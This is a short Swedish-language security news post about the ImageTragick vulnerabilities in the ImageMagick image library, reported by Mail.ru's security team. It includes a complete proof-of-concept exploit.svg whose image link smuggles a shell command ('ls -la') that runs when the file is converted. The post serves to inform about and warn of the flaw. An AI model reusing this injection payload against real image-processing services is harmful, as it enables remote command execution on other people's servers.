ImageMagick är ett bibliotek samt fristående verktyg för den som vill behandla bilder. Första versionen kom redan år 1990 och stödjer hela 200 olika bildformat.

Några personer vid Mail.ru:s säkerhetsteam identifierade bristerna och meddelar samtidigt att minst en sårbarhet i ImageMagick utnyttjas på Internet. Flertalet sårbarheter har uppdagats och går under namnet ImageTragick (även med sajten imagetragick.com).

Många använder ImageMagick utan att ens veta om det eftersom biblioteket finns inbakat i hårdvara, IoT-prylar, kommersiell mjukvara etc.

En exploit Proof-of-concept kommer även att släppas med följande URL: https://github.com/ImageTragick/PoCs

Men redan nu finns det ett antal PoC-filer ute, såsom denna vid namn exploit.svg  som kör godtyckligt kommando:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

Och sedan när kommandot convert (följer med ImageMagick) körs mot ovanstående filinnehåll så exekveras ls -la. Läs mer här